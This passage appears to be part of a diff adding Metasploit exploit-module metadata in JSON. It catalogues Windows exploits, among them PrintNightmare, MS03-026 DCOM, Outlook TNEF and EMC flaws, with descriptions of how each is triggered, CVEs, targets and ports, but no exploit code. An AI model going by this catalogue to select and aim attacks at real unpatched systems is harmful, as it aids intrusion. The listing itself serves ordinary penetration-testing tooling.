By sending an overly long string\n to the \"ApplicationType()\" property, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2007-0348", + "OSVDB-34315", + "BID-23071" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English ALL", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/windvd7_applicationtype.rb", + "is_install_path": true, + "ref_name": "windows/browser/windvd7_applicationtype", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/winzip_fileview": { + "name": "WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/winzip_fileview", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-11-02", + "type": "exploit", + "author": [ + "dean " + ], + "description": "The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n remote attacker to execute arbitrary code on the system. The control contains\n several unsafe methods and is marked safe for scripting and safe for initialization.\n A remote attacker could exploit this vulnerability to execute arbitrary code on the\n victim system. 
WinZip 10.0 <= Build 6667 are vulnerable.", + "references": [ + "CVE-2006-5198", + "OSVDB-30433", + "BID-21060" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/winzip_fileview.rb", + "is_install_path": true, + "ref_name": "windows/browser/winzip_fileview", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/wmi_admintools": { + "name": "Microsoft WMI Administration Tools ActiveX Buffer Overflow", + "fullname": "exploit/windows/browser/wmi_admintools", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-12-21", + "type": "exploit", + "author": [ + "WooYun", + "MC ", + "jduck " + ], + "description": "This module exploits a memory trust issue in the Microsoft WMI\n Administration tools ActiveX control. When processing a specially crafted\n HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n as a trusted pointer. It makes an indirect call via this pointer which leads\n to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. 
As such, this module should be reliable on all Windows\n versions.\n\n The WMI Administrative Tools are a standalone download & install (linked in the\n references).", + "references": [ + "OSVDB-69942", + "CVE-2010-3973", + "BID-45546", + "URL-http://wooyun.org/bug.php?action=view&id=1006", + "URL-http://web.archive.org/web/20101228043011/http://secunia.com:80/advisories/42693", + "URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows Universal", + "Debug Target (Crash)" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/wmi_admintools.rb", + "is_install_path": true, + "ref_name": "windows/browser/wmi_admintools", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/x360_video_player_set_text_bof": { + "name": "X360 VideoPlayer ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/x360_video_player_set_text_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-01-30", + "type": "exploit", + "author": [ + "Rh0", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. 
By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.", + "references": [ + "EDB-35948", + "URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/x360_video_player_set_text_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/xmplay_asx": { + "name": "XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow", + "fullname": "exploit/windows/browser/xmplay_asx", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-11-21", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n The vulnerability is caused due to a boundary error within\n the parsing of playlists containing an overly long file name.\n This module uses the ASX file format.", + "references": [ + "CVE-2006-6063", + "OSVDB-30537", + "BID-21206", + "URL-http://web.archive.org/web/20070502134818/http://secunia.com:80/advisories/22999" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English SP4", + "Windows XP Pro SP2 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/xmplay_asx.rb", + "is_install_path": true, + "ref_name": "windows/browser/xmplay_asx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/yahoomessenger_fvcom": { 
+ "name": "Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/yahoomessenger_fvcom", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-08-30", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string\n to the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n to execute arbitrary code.", + "references": [ + "CVE-2007-4515", + "OSVDB-37739", + "BID-25494", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2 Pro English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/yahoomessenger_fvcom.rb", + "is_install_path": true, + "ref_name": "windows/browser/yahoomessenger_fvcom", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/yahoomessenger_server": { + "name": "Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/yahoomessenger_server", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-06-05", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n Control (ywcupl.dll) provided by Yahoo! 
Messenger version 8.1.0.249.\n By sending an overly long string to the \"Server()\" method, and then calling\n the \"Send()\" method, an attacker may be able to execute arbitrary code.\n Using the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n yield for the best results.", + "references": [ + "CVE-2007-3147", + "OSVDB-37082" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1 Pro English", + "Windows 2000 Pro English All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/yahoomessenger_server.rb", + "is_install_path": true, + "ref_name": "windows/browser/yahoomessenger_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/zenturiprogramchecker_unsafe": { + "name": "Zenturi ProgramChecker ActiveX Control Arbitrary File Download", + "fullname": "exploit/windows/browser/zenturiprogramchecker_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2007-05-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.", + "references": [ + "CVE-2007-2987", + "OSVDB-36715", + "BID-24217" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/zenturiprogramchecker_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/browser/zenworks_helplauncher_exec": { + "name": "AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution", + "fullname": "exploit/windows/browser/zenworks_helplauncher_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-10-19", + "type": "exploit", + "author": [ + "rgod", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The\n LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run\n arbitrary commands on the victim machine. This module has been successfully tested with the\n ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration\n Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.", + "references": [ + "CVE-2011-2657", + "OSVDB-76700", + "BID-50274", + "ZDI-11-318", + "URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/zenworks_helplauncher_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/dcerpc/cve_2021_1675_printnightmare": { + "name": "Print Spooler Remote DLL Injection", + "fullname": "exploit/windows/dcerpc/cve_2021_1675_printnightmare", + "aliases": [ + "auxiliary/admin/dcerpc/cve_2021_1675_printnightmare" + ], + "rank": 300, + "disclosure_date": "2021-06-08", + "type": "exploit", + "author": [ + "Zhiniang Peng", + "Xuefeng Li", + "Zhipeng Huo", + "Piotr Madej", + "Zhang Yunhai", + "cube0x0", + "Spencer McIntyre", + "Christophe De La Fuente" + ], + "description": "The print spooler service can be 
abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.", + "references": [ + "CVE-2021-1675", + "CVE-2021-34527", + "URL-https://github.com/cube0x0/CVE-2021-1675", + "URL-https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare", + "URL-https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1", + "URL-https://github.com/byt3bl33d3r/ItWasAllADream" + ], + "platform": "", + "arch": "", + "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], + "targets": [ + "Windows" + ], + "mod_time": "2022-05-24 09:16:30 +0000", + "path": "/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/cve_2021_1675_printnightmare", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "PrintNightmare" + ], + "Stability": [ + "crash-service-down" + ], + "Reliability": [ + "unreliable-session" + ], + "SideEffects": [ + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms03_026_dcom": { + "name": "MS03-026 Microsoft RPC DCOM Interface Overflow", + "fullname": "exploit/windows/dcerpc/ms03_026_dcom", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-07-16", + "type": "exploit", + "author": [ + "hdm ", + "spoonm ", + "cazz " + ], + "description": "This module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n was originally found by the Last Stage of Delirium research group and has been\n widely exploited ever since. 
This module can exploit the English versions of\n Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)", + "references": [ + "CVE-2003-0352", + "OSVDB-2100", + "MSB-MS03-026", + "BID-8205" + ], + "platform": "Windows", + "arch": "", + "rport": 135, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT SP3-6a/2000/XP/2003 Universal" + ], + "mod_time": "2021-11-28 08:25:31 +0000", + "path": "/modules/exploits/windows/dcerpc/ms03_026_dcom.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms03_026_dcom", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms05_017_msmq": { + "name": "MS05-017 Microsoft Message Queueing Service Path Overflow", + "fullname": "exploit/windows/dcerpc/ms05_017_msmq", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-04-12", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. 
The offset to the\n return address changes based on the length of the system\n hostname, so this must be provided via the 'HNAME' option.\n Much thanks to snort.org and Jean-Baptiste Marchand's\n excellent MSRPC website.", + "references": [ + "CVE-2005-0059", + "OSVDB-15458", + "MSB-MS05-017", + "BID-13112" + ], + "platform": "Windows", + "arch": "", + "rport": 2103, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 ALL / Windows XP SP0-SP1 (English)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/dcerpc/ms05_017_msmq.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms05_017_msmq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms07_029_msdns_zonename": { + "name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)", + "fullname": "exploit/windows/dcerpc/ms07_029_msdns_zonename", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-04-12", + "type": "exploit", + "author": [ + "hdm ", + "Unknown", + "bcoles " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. 
This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2.", + "references": [ + "CVE-2007-1748", + "OSVDB-34100", + "MSB-MS07-029" + ], + "platform": "Windows", + "arch": "", + "rport": 0, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic (2000 SP0-SP4, 2003 SP0-SP2)", + "Windows 2000 Server SP0-SP4+ English", + "Windows 2000 Server SP0-SP4+ French", + "Windows 2000 Server SP0-SP4+ German", + "Windows 2000 Server SP0-SP4+ Italian", + "Windows 2000 Server SP0-SP4+ Polish", + "Windows 2000 Server SP0-SP4+ Portuguese", + "Windows 2000 Server SP0-SP4+ Korean", + "Windows 2000 Server SP0-SP4+ Russian", + "Windows 2000 Server SP0-SP4+ Simplified Chinese", + "Windows 2000 Server SP0-SP4+ Spanish", + "Windows 2000 Server SP0-SP4+ Swedish", + "Windows 2000 Server SP0-SP4+ Traditional Chinese", + "Windows 2000 Server SP0-SP4+ Turkish", + "Windows 2003 Server SP0 English", + "Windows 2003 Server SP0 French", + "Windows 2003 Server SP1-SP2 English", + "Windows 2003 Server SP1-SP2 French", + "Windows 2003 Server SP1-SP2 Spanish", + "Windows 2003 Server SP1-SP2 Italian", + "Windows 2003 Server SP1-SP2 German", + "Windows 2003 Server SP1-SP2 Russian", + "Windows 2003 Server SP1-SP2 Simplified Chinese" + ], + "mod_time": "2021-11-30 07:38:08 +0000", + "path": "/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms07_029_msdns_zonename", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/dcerpc/ms07_065_msmq": { + "name": "MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow", + "fullname": "exploit/windows/dcerpc/ms07_065_msmq", + "aliases": [], + "rank": 400, + "disclosure_date": "2007-12-11", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the RPC interface\n to the 
Microsoft Message Queueing service. This exploit requires\n the target system to have been configured with a DNS name and\n for that name to be supplied in the 'DNAME' option. This name does\n not need to be served by a valid DNS server, only configured on\n the target machine.", + "references": [ + "CVE-2007-3039", + "OSVDB-39123", + "MSB-MS07-065" + ], + "platform": "Windows", + "arch": "", + "rport": 2103, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/dcerpc/ms07_065_msmq.rb", + "is_install_path": true, + "ref_name": "windows/dcerpc/ms07_065_msmq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/email/ms07_017_ani_loadimage_chunksize": { + "name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)", + "fullname": "exploit/windows/email/ms07_017_ani_loadimage_chunksize", + "aliases": [], + "rank": 500, + "disclosure_date": "2007-03-28", + "type": "exploit", + "author": [ + "hdm ", + "skape " + ], + "description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function of USER32.dll. 
The flaw is triggered\n through Outlook Express by using the CURSOR style sheet\n directive to load a malicious .ANI file.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.", + "references": [ + "MSB-MS07-017", + "CVE-2007-0038", + "CVE-2007-1765", + "OSVDB-33629", + "BID-23194" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic", + "Windows XP SP2 user32.dll 5.1.2600.2622", + "Windows XP SP2 userenv.dll English", + "Windows XP SP2 userenv.dll French", + "Windows XP SP0/SP1 netui2.dll English", + "Windows 2000 SP0-SP4 netui2.dll English", + "Windows Vista user32.dll 6.0.6000.16386", + "Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language", + "Windows XP SP2 user32.dll (5.1.2600.2180) English", + "Windows XP SP2 userenv.dll Portuguese (Brazil)", + "Windows XP SP1a userenv.dll English", + "Windows XP SP1a shell32.dll English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb", + "is_install_path": true, + "ref_name": "windows/email/ms07_017_ani_loadimage_chunksize", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/email/ms10_045_outlook_ref_only": { + "name": "Outlook ATTACH_BY_REF_ONLY File Execution", + "fullname": "exploit/windows/email/ms10_045_outlook_ref_only", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-01", + "type": "exploit", + "author": [ + "Yorick Koster " + ], + "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. 
Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also files stored remotely (on a file share, for example)\n can be used. Exploitation is limited by the fact that it is not possible for attackers\n to supply command line options.", + "references": [ + "MSB-MS10-045", + "CVE-2010-0266", + "OSVDB-66296", + "BID-41446", + "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb", + "is_install_path": true, + "ref_name": "windows/email/ms10_045_outlook_ref_only", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/email/ms10_045_outlook_ref_resolve": { + "name": "Outlook ATTACH_BY_REF_RESOLVE File Execution", + "fullname": "exploit/windows/email/ms10_045_outlook_ref_resolve", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-01", + "type": "exploit", + "author": [ + "Yorick Koster " + ], + "description": "It has been discovered that certain e-mail message cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. 
These\n files can be local files, but also file stored remotely for example on a file share.\n Exploitation is limited by the fact that its is not possible for attackers to supply\n command line options.", + "references": [ + "MSB-MS10-045", + "CVE-2010-0266", + "OSVDB-66296", + "BID-41446", + "URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001" + ], + "platform": "Windows", + "arch": "", + "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb", + "is_install_path": true, + "ref_name": "windows/email/ms10_045_outlook_ref_resolve", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/emc/alphastor_agent": { + "name": "EMC AlphaStor Agent Buffer Overflow", + "fullname": "exploit/windows/emc/alphastor_agent", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-05-27", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n By sending a specially crafted message, an attacker may\n be able to execute arbitrary code.", + "references": [ + "CVE-2008-2158", + "OSVDB-45714", + "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702" + ], + "platform": "Windows", + "arch": "", + "rport": 41025, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC AlphaStor 3.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/alphastor_agent.rb", + "is_install_path": true, + "ref_name": "windows/emc/alphastor_agent", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/emc/alphastor_device_manager_exec": { + "name": "EMC AlphaStor Device Manager Opcode 0x75 Command Injection", + "fullname": "exploit/windows/emc/alphastor_device_manager_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-01-18", + "type": "exploit", + "author": [ + "Anyway ", + "Preston Thornburn ", + "Mohsan Farid ", + "Brent Morris ", + "juan vazquez " + ], + "description": "This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75\n command, the process does not properly filter user supplied input allowing for arbitrary\n command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116\n with Windows 2003 SP2 and Windows 2008 R2.", + "references": [ + "CVE-2013-0928", + "ZDI-13-033" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC AlphaStor 4.0 < build 800 / Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/alphastor_device_manager_exec.rb", + "is_install_path": true, + "ref_name": "windows/emc/alphastor_device_manager_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/emc/networker_format_string": { + "name": "EMC Networker Format String", + "fullname": "exploit/windows/emc/networker_format_string", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-08-29", + "type": "exploit", + "author": [ + "Aaron Portnoy", + "Luigi Auriemma ", + "juan vazquez " + ], + "description": "This module exploits a format string vulnerability in the lg_sprintf function\n as implemented in liblocal.dll on EMC Networker products. This module exploits the\n vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,\n version 0x02, and procedure 0x06. 
This module has been tested successfully on EMC\n Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", + "references": [ + "CVE-2012-2288", + "OSVDB-85116", + "BID-55330", + "URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 111, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC Networker 7.6 SP3 / Windows Universal", + "EMC Networker 7.6 SP3 / Windows XP SP3", + "EMC Networker 7.6 SP3 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/networker_format_string.rb", + "is_install_path": true, + "ref_name": "windows/emc/networker_format_string", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/emc/replication_manager_exec": { + "name": "EMC Replication Manager Command Execution", + "fullname": "exploit/windows/emc/replication_manager_exec", + "aliases": [], + "rank": 500, + "disclosure_date": "2011-02-07", + "type": "exploit", + "author": [ + "Unknown", + "Davy Douhine" + ], + "description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. 
EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\n against these products.", + "references": [ + "CVE-2011-0647", + "OSVDB-70853", + "BID-46235", + "URL-http://www.securityfocus.com/archive/1/516260", + "ZDI-11-061" + ], + "platform": "Windows", + "arch": "x86", + "rport": 6542, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "EMC Replication Manager 5.2.1 / Windows Native Payload" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/emc/replication_manager_exec.rb", + "is_install_path": true, + "ref_name": "windows/emc/replication_manager_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/a_pdf_wav_to_mp3": { + "name": "A-PDF WAV to MP3 v1.0.0 Buffer Overflow", + "fullname": "exploit/windows/fileformat/a_pdf_wav_to_mp3", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-17", + "type": "exploit", + "author": [ + "d4rk-h4ck3r", + "Dr_IDE", + "dookie" + ], + "description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. 
When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", + "references": [ + "OSVDB-67241", + "EDB-14676", + "EDB-14681" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/a_pdf_wav_to_mp3", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/abbs_amp_lst": { + "name": "ABBS Audio Media Player .LST Buffer Overflow", + "fullname": "exploit/windows/fileformat/abbs_amp_lst", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-30", + "type": "exploit", + "author": [ + "Julian Ahrens", + "modpr0be " + ], + "description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n of the user running the application. 
This module has been tested successfully on\n ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.", + "references": [ + "OSVDB-75096", + "EDB-25204" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb", + "is_install_path": true, + "ref_name": "windows/fileformat/abbs_amp_lst", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/fileformat/acdsee_fotoslate_string": { + "name": "ACDSee FotoSlate PLP File id Parameter Overflow", + "fullname": "exploit/windows/fileformat/acdsee_fotoslate_string", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-09-12", + "type": "exploit", + "author": [ + "Parvez Anwar", + "juan vazquez " + ], + "description": "This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via\n a specially crafted id parameter in a String element. When viewing a malicious\n PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a\n buffer and execute arbitrary code. 
